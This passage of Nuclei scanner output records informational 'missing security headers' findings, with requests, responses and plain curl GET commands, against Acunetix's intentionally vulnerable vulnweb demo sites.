valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:13.622519745Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:14.211463812Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211557153Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211574769Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not 